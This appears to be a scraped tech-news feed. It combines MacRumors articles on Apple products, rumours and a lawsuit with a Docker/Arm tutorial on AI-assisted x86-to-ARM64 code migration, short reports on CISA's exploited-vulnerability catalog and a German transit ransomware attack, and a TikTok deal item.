If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Best Apple Deals of the Week: Apple Studio Display Hits Lowest Prices in Months, Plus Accessory Discounts From Satechi and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple to Show More Ads in App Store Starting in March

In an email to developers this week, Apple indicated that it will begin showing additional ads in App Store search results starting Tuesday, March 3.


The extra ads will first appear in the App Store in the U.K. and Japan, followed by other markets like the U.S. by the end of March, according to Apple.

Apple first announced that it would be expanding the number of ad slots in the App Store search results last month, but it had not provided an exact date for the change until now. Currently, developers can only pay to have an app appear in a single slot at the top of the search results, but Apple said there will now be multiple slots further down.

Apple shared more details on its website:The extra ad slots will be visible on iPhone and iPad devices running iOS 26.2 or iPadOS 26.2 and later. Apps with paid placement have an "Ad" label.

Ads are also shown in the App Store's "Today" tab, in a "You Might Also Like" section at the bottom of individual app listings, and in the search tab's "Suggested" section. Apple rebranded its "Search Ads" business as "Apple Ads" last year, as it reportedly prepares to begin showing ads in more places, such as Apple Maps.Tags: App Store, Apple Ads
This article, "Apple to Show More Ads in App Store Starting in March" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

The MacRumors Show: Apple's Upcoming Siri Chatbot and AI Pin

On this week's episode of The MacRumors Show, we discuss Apple's plan to turn Siri into a chatbot with iOS 27, alongside plans for new hardware such as an AI pin.

Subscribe to The MacRumors Show YouTube channel for more videos

Apple reportedly plans to turn Siri into a chatbot that will rival Anthropic's Claude, Google's Gemini, and OpenAI's ChatGPT later this year. Apple's chatbot will apparently be able to search the web, generate content like images, help with coding, summarize information, and analyze uploaded files.

It will be able to leverage personal data on a user's device to complete tasks, and it will result in a much improved search feature. Apple is also said to be designing a feature that will let the ‌Siri‌ chatbot view open windows and on-screen content, as well as adjust device features and settings.

‌Siri‌ will integrate directly into all Apple apps, including Photos, Mail, Messages, Music, and TV, and it will be able to access and analyze content in the apps to respond to queries and requests. There will be voice and typed interface options.

Apple plans to power the chatbot with a custom model based on Google Gemini. It may even run on Google's servers. The ‌Siri‌ chatbot will purportedly be the key new feature in iOS 27, iPadOS 27, and macOS 27.

In related news, Apple is said to be working on a small, wearable AI pin equipped with standard and wide-angle cameras to capture photos and videos, a speaker, microphones, and a physical control button. The pin is said to be similar in size to an AirTag, with a thin, flat, circular disc shape and an aluminum and glass design.

This week also saw rumors that Apple's smart home hub device will tout a robotic swiveling base, with a heavy emphasis on AI features. It is expected to finally be released in the spring, following a heavily delayed launch.

The MacRumors Show has its own YouTube channel, so make sure you're subscribed to keep up with new episodes and clips.

Subscribe to The MacRumors Show YouTube channel!

You can also listen to ‌The MacRumors Show‌ on Apple Podcasts, Spotify, Overcast, or your preferred podcasts app. You can also copy our RSS feed directly into your podcast player.



If you haven't already listened to the previous episode of The MacRumors Show, catch up to hear our discussion about CES 2026, Apple Creator Studio, and the confirmation that Google Gemini will power the next-generation version of ‌Siri‌.

Subscribe to ‌The MacRumors Show‌ for new episodes every week, where we discuss some of the topical news breaking here on MacRumors, often joined by interesting guests such as Kayci Lacob, Kevin Nether, John Gruber, Mark Gurman, Jon Prosser, Luke Miani, Matthew Cassinelli, Brian Tong, Quinn Nelson, Jared Nelson, Eli Hodapp, Mike Bell, Sara Dietschy, iJustine, Jon Rettinger, Andru Edwards, Arnold Kim, Ben Sullins, Marcus Kane, Christopher Lawley, Frank McShan, David Lewis, Tyler Stalman, Sam Kohl, Federico Viticci, Thomas Frank, Jonathan Morrison, Ross Young, Ian Zelbo, and Rene Ritchie.

‌The MacRumors Show‌ is on X @MacRumorsShow, so be sure to give us a follow to keep up with the podcast. You can also head over to The MacRumors Show forum thread to engage with us directly. Remember to rate and review the podcast, and let us know what subjects and guests you would like to see in the future.Tag: The MacRumors Show
This article, "The MacRumors Show: Apple's Upcoming Siri Chatbot and AI Pin" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Rumored to Partner With Intel on iPhone Chips

It has once again been rumored that Apple might revive its chipmaking partnership with Intel, but the chips would be designed by Apple rather than Intel.


In a research note today, obtained by MacRumors, GF Securities analyst Jeff Pu reiterated his expectation that Intel will begin supplying some Apple chips using its future 14A process, which is expected to be ready for mass production in 2028.

Last month, Pu said that he expected Intel to reach a chip supply deal with Apple for at least some non-pro iPhone models starting in 2028. Based on that timeframe, Intel could supply Apple with at least a portion of future A21 or A22 chips for iPhones, but TSMC is expected to remain Apple's primary chipmaking partner.

There is no indication that Intel would play a role in designing the iPhone chips, with its involvement expected to be strictly limited to fabrication. That would differ from the era of Intel Macs, which used Intel-designed processors with x86 architecture. Apple began transitioning away from Intel processors in Macs in 2020.

Intel also supplied Apple with cellular modems for some iPhone 7 to iPhone 11 models.

Apple's return to Intel might also involve some Mac and iPad chips. Last year, Tianfeng Securities analyst Ming-Chi Kuo said he expected Intel to begin shipping Apple's lowest-end M-series chip for select Mac and iPad models as early as mid-2027. For this, Kuo said Apple planned to utilize Intel's 18A process. He did not mention the iPhone.

Intel would help Apple to diversify its supply chain, which could come at a pivotal time, as Nvidia has reportedly surpassed Apple as TSMC's largest customer amid rising competition for chip supply for consumer devices and especially AI servers.Tags: Intel, Jeff Pu
This article, "Apple Rumored to Partner With Intel on iPhone Chips" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Raised UK Banking Costs, Lawsuit Alleges

A new UK class action lawsuit against Apple seeks billions in damages by alleging that the company unlawfully restricted competition in contactless payments on the iPhone through Apple Pay, The Guardian reports.


The proposed opt-out collective action filed this week in the UK alleges that Apple abused its position in the market by limiting access to the ‌iPhone‌'s near-field communication (NFC) technology and charging fees to banks for the use of ‌Apple Pay‌. The claim seeks up to £1.5 billion (approximately $2 billion) in damages on behalf of an estimated 50 million UK consumers.

The complainant argues that ‌Apple Pay‌ has effectively been the only contactless mobile payment option available to ‌iPhone‌ users in the UK since its launch in 2015. According to the filing, Apple declined to grant third-party developers access to the ‌iPhone‌'s NFC hardware and Secure Element, preventing rival wallets from operating on equal terms and leaving banks and card issuers with no alternative but to participate in ‌Apple Pay‌ if they wished to offer mobile contactless payments to ‌iPhone‌ users.

The case heavily focuses on fees Apple reportedly charges issuing banks for ‌Apple Pay‌ transactions, commonly cited in industry reporting as approximately 0.15% of the transaction value in the UK. These fees are allegedly not consistent with industry norms and were only possible because Apple restricted competition on its platform. The suit further contends that banks passed the costs of those fees on to consumers through higher charges across a wide range of financial products, including current accounts, credit cards, savings accounts, and mortgages.

Around 98% of UK consumers hold accounts with banks that support ‌Apple Pay‌ and were therefore exposed to higher costs regardless of whether they personally used the service. On that basis, the claim seeks damages on a population-wide basis. The average payout per affected consumer would be relatively modest, estimated at roughly £26 to £35 if the claim were successful.

In a statement, Apple said that the lawsuit was "misguided and should be dismissed," adding:



Apple also emphasized changes to its platform that have occurred since the period covered by the claim. The company said it has recently expanded access to key technologies, including NFC and the Secure Element, allowing third-party developers to offer contactless payments within their own apps in the UK.

The claim has been lodged with the Competition Appeal Tribunal, which must determine whether the case can proceed as a collective action.Tags: Apple Antitrust, Apple Pay, NFC, United Kingdom
This article, "Apple Raised UK Banking Costs, Lawsuit Alleges" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

CISA Updates KEV Catalog with Four Actively Exploited Software Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2025-68645 (CVSS score: 8.8) - A PHP remote file inclusion vulnerability in Synacor Zimbra Collaboration Suite (ZCS) that could allow aView the full article
Hacker News

AirPods Pro 3 Drop to All-Time Low Price of $199.99

Best Buy today has a match of the record low price on the AirPods Pro 3, available for $199.99, down from $249.00. This is only the second time in 2026 that we've tracked the AirPods Pro 3 at this low price, which matches the best deal we saw over the holiday season. This is a flash sale and it will end later tonight, so those interested should shop soon.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

This model of the AirPods Pro launched in September 2025 and has 2x better Active Noise Cancellation than the previous generation, better audio quality, a revised fit that's meant to improve comfort and stability, Live Translation for in-person conversations, and heart rate sensing for workouts.

$49 OFFAirPods Pro 3 for $199.99

Keep up with all of this week's best discounts on Apple products and related accessories in our dedicated Apple Deals roundup.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "AirPods Pro 3 Drop to All-Time Low Price of $199.99" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

How to Automate Arm Migration with Docker MCP Toolkit, VS Code, and GitHub Copilot

This post is a collaboration between Docker and Arm, demonstrating how Docker MCP Toolkit and the Arm MCP Server work together to simplify architecture migrations.
Moving workloads from x86 to ARM64 architecture has become increasingly important. Organizations seek to reduce cloud costs and improve performance. AWS Graviton, Azure Cobalt, and Google Cloud Axion have made Arm-based computing mainstream, promising 20-40% cost savings and better performance for many workloads.
But here’s the challenge: How do you migrate your applications to Arm without breaking things?
Traditional migration approaches require:
Manual code analysis for x86-specific dependencies Tedious compatibility checks across multiple tools Manual performance evaluation What if you could orchestrate the entire Arm migration workflow from a single interface? Docker MCP Toolkit makes this possible. 
By connecting specialized Arm migration tools directly to GitHub Copilot, you can automate compatibility analysis, intrinsic conversion, and performance prediction—all through natural conversation in VS Code.
Here’s what that looks like in practice: You ask GitHub Copilot to migrate your legacy C++ application to ARM64. Copilot doesn’t just tell you what needs changing—it actually executes: scanning your code for x86 intrinsics, converting x86 SIMD intrinsics to Arm SIMD intrinsics, updating your Dockerfile, predicting Arm performance improvements, and creating a pull request with all changes. All through natural conversation in VS Code. No manual porting. No up-front architecture expertise required.
If you have questions about any step in the process, you can directly ask Copilot, which will invoke the Arm MCP Server knowledge base tool. The knowledge base has information pulled directly from all Learning Paths on learn.arm.com, as well as knowledge of all Arm intrinsics, and will both summarize that information for you as well as provide links to the concrete documentation that you can peruse yourself. 
Now you might ask – “Can’t I just rebuild my Docker image for ARM64?” True, for most applications. But when you hit that one legacy app with hand-optimized x86 assembly, AVX2 intrinsics, or architecture-specific compiler flags? That’s when Docker MCP Toolkit with the Arm MCP Server becomes essential.
By the end of this guide, you’ll migrate a real-world legacy application—a matrix multiplication benchmark written with AVX2 intrinsics for x86—to ARM64 automatically using GitHub Copilot and Docker MCP Toolkit.
What normally takes 5-7 hours of manual work will take you about 25 to 30 minutes.
The Arm Migration Challenge
Let me show you exactly what we’re solving. Consider a matrix multiplication benchmark originally written for x86-64 with AVX2 optimizations—the kind of code that makes Arm migration painful.
Here’s a Dockerfile that will cause problems when trying to migrate to Graviton:
FROM centos:6 # CentOS 6 reached EOL, need to use vault mirrors RUN sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/CentOS-Base.repo && \ sed -i 's|^#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-Base.repo # Install EPEL repository (required for some development tools) RUN yum install -y epel-release && \ sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/epel.repo && \ sed -i 's|^#baseurl=http://download.fedoraproject.org/pub/epel|baseurl=http://archives.fedoraproject.org/pub/archive/epel|g' /etc/yum.repos.d/epel.repo # Install Developer Toolset 2 for better C++11 support (GCC 4.8) RUN yum install -y centos-release-scl && \ sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/CentOS-SCLo-scl.repo && \ sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/CentOS-SCLo-scl-rh.repo && \ sed -i 's|^# baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-SCLo-scl.repo && \ sed -i 's|^# baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-SCLo-scl-rh.repo # Install build tools RUN yum install -y \ devtoolset-2-gcc \ devtoolset-2-gcc-c++ \ devtoolset-2-binutils \ make \ && yum clean all WORKDIR /app COPY *.h *.cpp ./ # AVX2 intrinsics are used in the code RUN scl enable devtoolset-2 "g++ -O2 -mavx2 -o benchmark \ main.cpp \ matrix_operations.cpp \ -std=c++11" CMD ["./benchmark"] Now you might ask why this won’t work on Arm? Looking at this Dockerfile, there are two immediate blockers for Graviton migration:
No ARM64 support in base image – The centos:6 image was built for x86 only, so this container won’t even start on Arm hardware. x86-specific compiler flag – The -mavx2 flag tells the compiler to use AVX2 vector instructions, which don’t exist on Arm processors. Even experienced developers miss these issues in larger codebases.
The source code uses AVX2 intrinsics for vectorized operations:
#include "matrix_operations.h" #include <iostream> #include <random> #include <chrono> #include <stdexcept> #include <immintrin.h> // AVX2 intrinsics Matrix::Matrix(size_t r, size_t c) : rows(r), cols(c) { data.resize(rows, std::vector<double>(cols, 0.0)); } void Matrix::randomize() { std::random_device rd; std::mt19937 gen(rd()); std::uniform_real_distribution<> dis(0.0, 10.0); for (size_t i = 0; i < rows; i++) { for (size_t j = 0; j < cols; j++) { data[i][j] = dis(gen); } } } Matrix Matrix::multiply(const Matrix& other) const { if (cols != other.rows) { throw std::runtime_error("Invalid matrix dimensions for multiplication"); } Matrix result(rows, other.cols); // x86-64 optimized using AVX2 for double-precision for (size_t i = 0; i < rows; i++) { for (size_t j = 0; j < other.cols; j++) { __m256d sum_vec = _mm256_setzero_pd(); size_t k = 0; // Process 4 elements at a time with AVX2 for (; k + 3 < cols; k += 4) { __m256d a_vec = _mm256_loadu_pd(&data[i][k]); __m256d b_vec = _mm256_set_pd( other.data[k+3][j], other.data[k+2][j], other.data[k+1][j], other.data[k][j] ); sum_vec = _mm256_add_pd(sum_vec, _mm256_mul_pd(a_vec, b_vec)); } // Horizontal add using AVX __m128d sum_high = _mm256_extractf128_pd(sum_vec, 1); __m128d sum_low = _mm256_castpd256_pd128(sum_vec); __m128d sum_128 = _mm_add_pd(sum_low, sum_high); double sum_arr[2]; _mm_storeu_pd(sum_arr, sum_128); double sum = sum_arr[0] + sum_arr[1]; // Handle remaining elements for (; k < cols; k++) { sum += data[i][k] * other.data[k][j]; } result.data[i][j] = sum; } } return result; } double Matrix::sum() const { double total = 0.0; for (size_t i = 0; i < rows; i++) { for (size_t j = 0; j < cols; j++) { total += data[i][j]; } } return total; } void benchmark_matrix_ops() { std::cout << "\n=== Matrix Multiplication Benchmark ===" << std::endl; const size_t size = 200; Matrix a(size, size); Matrix b(size, size); a.randomize(); b.randomize(); auto start = std::chrono::high_resolution_clock::now(); Matrix c = a.multiply(b); auto end = std::chrono::high_resolution_clock::now(); auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(end - start); std::cout << "Matrix size: " << size << "x" << size << std::endl; std::cout << "Time: " << duration.count() << " ms" << std::endl; std::cout << "Result sum: " << c.sum() << std::endl; } If you look at the following code, you might find that this code is heavily optimized for Intel/AMD x86 processors and won’t work on Arm.
x86-exclusive header – #include <immintrin.h> only exists on x86 systems. Arm uses <arm_neon.h> instead. AVX2 intrinsics throughout – Every _mm256_* function is Intel-specific: _mm256_setzero_pd() – Creates a 256-bit zero vector (Arm NEON is 128-bit) _mm256_loadu_pd() – Loads 4 doubles at once (NEON loads 2) _mm256_set_pd() – Sets 4 doubles (no direct NEON equivalent) _mm256_add_pd() / _mm256_mul_pd() – 256-bit operations (NEON uses 128-bit) _mm256_extractf128_pd() – Extracts high 128 bits (not needed on NEON) Vector width mismatch – AVX2 processes 4 doubles per operation, while Arm NEON processes 2. The entire loop structure needs adjustment. (SVE/SVE2 on newer Arm cores (Neoverse V1/V2, Graviton 3/4) provides 256-bit or wider vector-length agnostic (VLA) registers, matching or exceeding AVX2 registers.) Horizontal reduction logic – The horizontal add pattern using _mm256_extractf128_pd and _mm256_castpd256_pd128 is x86-specific and must be completely rewritten for Arm SIMD. Manual conversion requires rewriting 30+ lines of intrinsic code, adjusting loop strides, and testing numerical accuracy. This is exactly where automated migration tools become essential.
Each of these issues blocks Arm migration in different ways. Manual migration requires not just converting intrinsics, but also modernizing the entire build infrastructure, finding Arm equivalents, and validating performance. For any substantial codebase, this becomes prohibitively expensive.
What GitHub Copilot Can and Can’t Do Without Arm MCP
Let’s be clear about what changes when you add the Arm MCP Server to Docker MCP Toolkit.
Without Arm MCP
You ask GitHub Copilot to migrate your C++ application from x86 to ARM64. Copilot responds with general advice: “Convert AVX2 intrinsics to NEON”, “Update your Dockerfile to use ARM64 base image”, “Change compiler flags”. Then you must manually research NEON equivalents, rewrite hundreds of lines of intrinsic code, update the Dockerfile yourself, hope you got the conversion right, and spend hours debugging compilation errors.
Yes, Copilot can write code. But without specialized tools, it’s guessing based on training data—not using concrete knowledge base documentation or using purpose-built tools to analyze your actual application architecture.
With Arm MCP + Docker MCP Toolkit
You ask GitHub Copilot the same thing. Within minutes, it:
Uses check_image tool to verify your base image supports ARM64 Runs migrate_ease_scan on your actual codebase to find x86-specific code Uses knowledge_base_search to find correct Arm SIMD equivalents for every x86 intrinsic Converts your code with architecture-specific accuracy Updates your Dockerfile with Arm-compatible base images Creates a pull request with all changes. Real code gets scanned. Real intrinsics get converted. Real pull requests appear in your repository. Close VS Code, come back tomorrow, and the migration is ready to test, complete with documentation explaining every change.
The difference? Docker MCP Toolkit gives GitHub Copilot access to actual Arm migration tooling, not just general knowledge about Arm architecture.
Why This Is Different from Manual Migration
You could manually use Arm migration tools: install utilities locally, run checks, research intrinsics, update code. Here’s what that process looks like:
Manual process:
Install Arm migration tools (15 minutes) Run compatibility scans (5 minutes) Research each x86 intrinsic equivalent (30 minutes per intrinsic) Manually rewrite code (2-3 hours) Update Dockerfile (15 minutes) Fix compilation errors (1-2 hours) Document changes (30 minutes) Total: 5-7 hours per application
With Docker MCP Toolkit + Arm MCP:
Ask GitHub Copilot to migrate (20 minutes) Review and approve changes (10-20 minutes) Merge pull request Total: 30-40 minutes per application
Setting Up Visual Studio Code with Docker MCP Toolkit
Prerequisites
Before you begin, make sure you have:
A machine with 8 GB RAM minimum (16GB recommended) The latest Docker Desktop release VS Code with GitHub Copilot extension GitHub account with personal access token Step 1. Enable Docker MCP Toolkit
Open Docker Desktop and enable the MCP Toolkit from Settings.
To enable:
Open Docker Desktop Go to Settings → Beta Features Toggle Docker MCP Toolkit ON Click Apply
Caption: Enabling Docker MCP Toolkit under Docker Desktop 
Add Required MCP Servers from Catalog
Add Arm, Sequential Thinking and GitHub Official by following the links below, or by selecting “Catalog” in the Docker Desktop MCP toolkit:
Arm MCP Server – Arm migration tools and architecture expertise GitHub MCP Server – Repository operations and pull request management Sequential Thinking MCP Server – Complex problem decomposition and planning Caption: Searching for Arm MCP Server in the Docker MCP Catalog
Step 2. Configure the Servers
Configure the Arm MCP Server To access your local code for the migrate-ease scan and MCA tools, the Arm MCP Server needs a directory configured to point to your local code.
Caption: Arm MCP Server configuration
Once you click ‘Save’, the Arm MCP Server will know where to look for your code. If you want to give a different directory access in the future, you’ll need to change this path.
Available Arm Migration Tools
Click Tools to view all the six MCP tools available under Arm MCP Server.
Caption: List of MCP tools provided by the Arm MCP Server
knowledge_base_search – Semantic search of Arm learning resources, intrinsics documentation, and software compatibility migrate_ease_scan – Code scanner supporting C++, Python, Go, JavaScript, and Java for Arm compatibility analysis check_image – Docker image architecture verification (checks if images support ARM64) skopeo – Remote container image inspection without downloading mca – Machine Code Analyzer for assembly performance analysis and IPC predictions sysreport_instructions – System architecture information gathering
Configure GitHub MCP Server The GitHub MCP Server lets GitHub Copilot create pull requests, manage issues, and commit changes.
Caption: Steps to configure GitHub Official MCP Server
Configure Authentication:
Select GitHub official Choose your preferred authentication method  For Personal Access Token, you’ll need to get the token from GitHub > Settings > Developer Settings Caption: Setting up Personal Access Token in GitHub MCP Server
Configure Sequential Thinking MCP Server Click “Sequential Thinking” No configuration needed Caption: Sequential MCP Server requires zero configuration
This server helps GitHub Copilot break down complex Arm migration decisions into logical steps.
Step 3. Add the Servers to VS Code
The Docker MCP Toolkit makes it incredibly easy to configure MCP servers for clients like VS Code.
To configure, click “Clients” and scroll down to Visual Studio Code. Click the “Connect” button:
Caption: Setting up Visual Studio Code as MCP Client
Now open VS Code and click on the ‘Extensions’ icon in the left toolbar:
Caption: Configuring MCP_DOCKER under VS Code Extensions
Click the MCP_DOCKER gear, and click ‘Start Server’:
Caption: Starting MCP Server under VS Code
Now you’re ready to perform an Arm migration!
Step 4. Verify Connection
Open GitHub Copilot Chat in VS Code and ask:
What Arm migration tools do you have access to? You should see tools from all three servers listed. If you see them, your connection works. Let’s migrate some code.
Caption: Playing around with GitHub Co-Pilot
Real-World Demo: Migrating a Legacy x86 Application
Now that you’ve connected GitHub Copilot to Docker MCP Toolkit, let’s migrate that matrix multiplication benchmark we looked at earlier.
Time to migrate: 20 minutes
Infrastructure: $0 (all runs in Docker containers)
Prerequisites: The code we showed earlier in this post
The Workflow
Docker MCP Toolkit orchestrates the migration through a secure MCP Gateway that routes requests to specialized tools: the Arm MCP Server scans code and converts intrinsics, GitHub MCP Server creates pull requests, and Sequential Thinking plans multi-step migrations. Each tool runs in an isolated Docker container: secure, reproducible, and under your control.
Step 1. Clone the repo
git clone https://github.com/JoeStech/docker-blog-arm-migration Give GitHub Copilot Migration Instructions
Open your project in VS Code. In GitHub Copilot Chat, paste this prompt:
Your goal is to migrate this codebase from x86 to ARM64. Use the Arm MCP Server tools to help you with this migration. Steps to follow: 1. Check all Dockerfiles - use check_image and/or skopeo tools to verify Arm compatibility, changing the base image if necessary 2. Scan the codebase - run migrate_ease_scan with the appropriate language scanner and apply the suggested changes 3. Use knowledge_base_search when you need Arm architecture guidance or intrinsic equivalents 4. Update compiler flags and dependencies for ARM64 compatibility 5. **Create a pull request with all changes using GitHub MCP Server** Important notes: - Your current working directory is mapped to /workspace on the MCP server - NEON lane indices must be compile-time constants, not variables - If you're unsure about Arm equivalents, use knowledge_base_search to find documentation - Be sure to find out from the user or system what the target machine is, and use the appropriate intrinsics. For instance, if neoverse (Graviton, Axion, Cobalt) is targeted, use the latest SME/SME2. **After completing the migration:** - Create a pull request with a detailed description of changes - Include performance predictions and cost savings in the PR description - List all tools used and validation steps needed Step 2. Watch Docker MCP Toolkit Execute
GitHub Copilot orchestrates the migration using Docker MCP Toolkit. Here’s what happens:
Phase 1: Image Analysis
GitHub Copilot starts by analyzing the Dockerfile’s base image using the Arm MCP Server’s skopeo tool.
Caption: GitHub Copilot uses the skopeo tool from the Arm MCP Server to analyze the centos:6 base image. The tool reports that this image has no arm64 build available. This is the first blocker identified – the container won’t even start on Arm hardware.
This immediately identifies that CentOS 6 has no ARM64 builds and must be replaced.
Phase 2: Code Analysis
Next, Copilot runs the migrate_ease_scan tool with the C++ scanner on the codebase.
Caption: The migrate_ease_scan tool analyzes the C++ source code and detects AVX2 intrinsics, the -mavx2 compiler flag, and x86-specific headers. This automated scan identifies all architecture-dependent code that requires conversion – work that could take hours to find manually.
The scan results show exactly what needs to change for Arm compatibility. Each detected issue includes the file location, line number, and specific code that requires modification. This precision eliminates guesswork and ensures nothing is missed.
Phase 3: Arm Optimization and Best Practices
Forx86 intrinsics found in Phase 2, Copilot queries the Arm MCP Server’s knowledge base for Arm equivalents, if needed. It then makes replacements as necessary.
Caption: GitHub Copilot uses the knowledge_base_search tool to find Arm NEON equivalents for each AVX2 intrinsic.
The tool returns official Arm documentation showing the conversions: _mm256_loadu_pd() becomes vld1q_f64(), _mm256_add_pd() becomes vaddq_f64(), and so on. This knowledge comes from learn.arm.com learning paths and intrinsic documentation.
The knowledge base provides not just the conversion mappings, but also architectural context: AVX2’s 256-bit vectors vs NEON’s 128-bit vectors, which means loop adjustments are needed. Copilot uses this information to rewrite the matrix multiplication code correctly.
Phase 4: Create the GitHub PR and Summarize
After completing the migration, Copilot creates a PR in GitHub and summarizes the changes made.
The changes are substantial: 
Replaced centos:6 → ubuntu:22.04, added TARGETARCH for multi-arch builds Added ARM64 detection and -march=armv8-a+simd compiler flag Converted AVX2 → NEON intrinsics with architecture guards The build is now simpler, modern, and Arm-compatible.
Phase 5: Checking the Pull Request
You can verify the Pull Request by visiting https://github.com/JoeStech/docker-blog-arm-migration/pull/1/

To verify performance, you can build and run the benchmark:
docker buildx build --platform linux/arm64 -t benchmark:arm64 . --load docker run --rm benchmark:arm64 Which should output:
SIMD Matrix Operations Benchmark ================================ Running on ARM64 architecture with NEON optimizations === Matrix Multiplication Benchmark === Matrix size: 200x200 Time: 17 ms Result sum: 1.98888e+08 Caveats
A very important thing to remember is that not all models will provide equal results, and while the Arm MCP Server provides deterministic context, the models themselves are stochastic. Always use a flagship latest-generation model to get the best results, and test any guesses the model makes regarding performance improvement.
How Docker MCP Toolkit Changes Development
Docker MCP Toolkit changes how developers interact with specialized knowledge and capabilities. Rather than learning new tools, installing dependencies, or managing credentials, developers connect their AI assistant once and immediately access containerized expertise.
The benefits extend beyond Arm migration:
Consistency – Same tools, same results across all developers Security – Containerized isolation prevents tool interference Version Control – MCP server versions tracked with application code Reproducibility – Migrations behave identically across environments Discoverability – Docker MCP Catalog makes finding the right server straightforward Most importantly, developers remain in their existing workflow. VS Code. GitHub Copilot. Git. No context switching to external tools or dashboards.
Wrapping Up
You’ve just automated ARM64 migration using Docker MCP Toolkit, the Arm MCP Server, and GitHub Copilot. What used to require architecture expertise, manual intrinsic conversion, and hours of debugging now happens through natural conversation, safely executed in Docker containers.
Ready to try it? Open Docker Desktop and explore the MCP Catalog. Start with the Arm MCP Server, add GitHub, experiment with Sequential Thinking. Each server unlocks new capabilities.
The future of migration isn’t manually porting every application. It’s having an AI assistant that can execute tasks across your entire stack securely, reproducibly, and at the speed of thought.
Learn More
New to Docker? Download Docker Desktop Explore the MCP Catalog: Discover containerized, security-hardened MCP servers Get Started with MCP Toolkit: Official Documentation
View the full article
reporter

Ransomware-Attacke auf Verkehrsgesellschaft Main-Tauber

VGMT
Die Geschäftsstelle sowie die Mobilitätszentrale der Verkehrsgesellschaft Main-Tauber (VGMT) sind derzeit geschlossen und weder telefonisch noch per E-Mail erreichbar. Wie die Organisation kürzlich mitteilte, steckt eine Cyberattacke dahinter. Demnach haben die Täter die Server und Daten des Unternehmens verschlüsselt.
Ob Daten gestohlen wurden, ist bisher unklar. Der Mitteilung zufolge sind die Ermittlungen in dem Fall noch nicht abgeschlossen. Weitere Details zu dem Angriff gibt es derzeit nicht.
„Die Verkehrsgesellschaft und das Landratsamt arbeiten unter Hochdruck daran, die Probleme zu lösen“, versichert VGMT-Geschäftsführer Thorsten Haas. Ziel sei es, schnellstmöglich zumindest einen eingeschränkten Service der Mobilitätszentrale und der VGMT-Geschäftsstelle zu ermöglichen.
ÖPNV nicht betroffen
Daran anschließend will die VGMT Schritt für Schritt unter weiter erhöhten Sicherheitsvorkehrungen zum regulären Betrieb zurückkehren. Wie lange das dauert, sei derzeit noch nicht absehbar, heißt es vonseiten der VGMT. Der Öffentliche Nahverkehr ist jedoch nicht von dem Vorfall betroffen.
Um den Fall aufzuklären, wurde die Cybersicherheitsagentur des Landes Baden-Württemberg und die Polizei eingeschaltet hinzugezogen. Zudem untersuchen  die IT-Spezialisten des Landratsamtes und eines Anbieters den Fall.
„Aus rechtlichen Gründen verfügt die VGMT über ein eigenes IT-Netzwerk, das von dem der Landkreisverwaltung vollständig getrennt ist“, erklärt die Verkehrsgesellschaft. Dadurch sei die Verwaltung von dem Angriff verschont geblieben.
View the full article
CSOonline

Ransomware-Attacke auf Verkehrsgesellschaft Main-Tauber

VGMT
Die Geschäftsstelle sowie die Mobilitätszentrale der Verkehrsgesellschaft Main-Tauber (VGMT) sind derzeit geschlossen und weder telefonisch noch per E-Mail erreichbar. Wie die Organisation kürzlich mitteilte, steckt eine Cyberattacke dahinter. Demnach haben die Täter die Server und Daten des Unternehmens verschlüsselt.
Ob Daten gestohlen wurden, ist bisher unklar. Der Mitteilung zufolge sind die Ermittlungen in dem Fall noch nicht abgeschlossen. Weitere Details zu dem Angriff gibt es derzeit nicht.
„Die Verkehrsgesellschaft und das Landratsamt arbeiten unter Hochdruck daran, die Probleme zu lösen“, versichert VGMT-Geschäftsführer Thorsten Haas. Ziel sei es, schnellstmöglich zumindest einen eingeschränkten Service der Mobilitätszentrale und der VGMT-Geschäftsstelle zu ermöglichen.
ÖPNV nicht betroffen
Daran anschließend will die VGMT Schritt für Schritt unter weiter erhöhten Sicherheitsvorkehrungen zum regulären Betrieb zurückkehren. Wie lange das dauert, sei derzeit noch nicht absehbar, heißt es vonseiten der VGMT. Der Öffentliche Nahverkehr ist jedoch nicht von dem Vorfall betroffen.
Um den Fall aufzuklären, wurde die Cybersicherheitsagentur des Landes Baden-Württemberg und die Polizei eingeschaltet hinzugezogen. Zudem untersuchen  die IT-Spezialisten des Landratsamtes und eines Anbieters den Fall.
„Aus rechtlichen Gründen verfügt die VGMT über ein eigenes IT-Netzwerk, das von dem der Landkreisverwaltung vollständig getrennt ist“, erklärt die Verkehrsgesellschaft. Dadurch sei die Verwaltung von dem Angriff verschont geblieben.
View the full article
CSOonline

TikTok Avoids US Ban as Joint Venture Deal Officially Closes

TikTok has announced that it has finalized a deal to establish a majority American-owned joint venture, allowing the app to continue operating in the United States indefinitely.


First agreed in December, the deal creates "TikTok USDS Joint Venture LLC," which will be 80.1 percent owned by U.S. and global investors, with ByteDance retaining a 19.9 percent stake. Oracle, Silver Lake, and Abu Dhabi-based MGX each hold 15 percent as managing investors. Additional stakeholders include the Dell Family Office and affiliates of Susquehanna International Group.

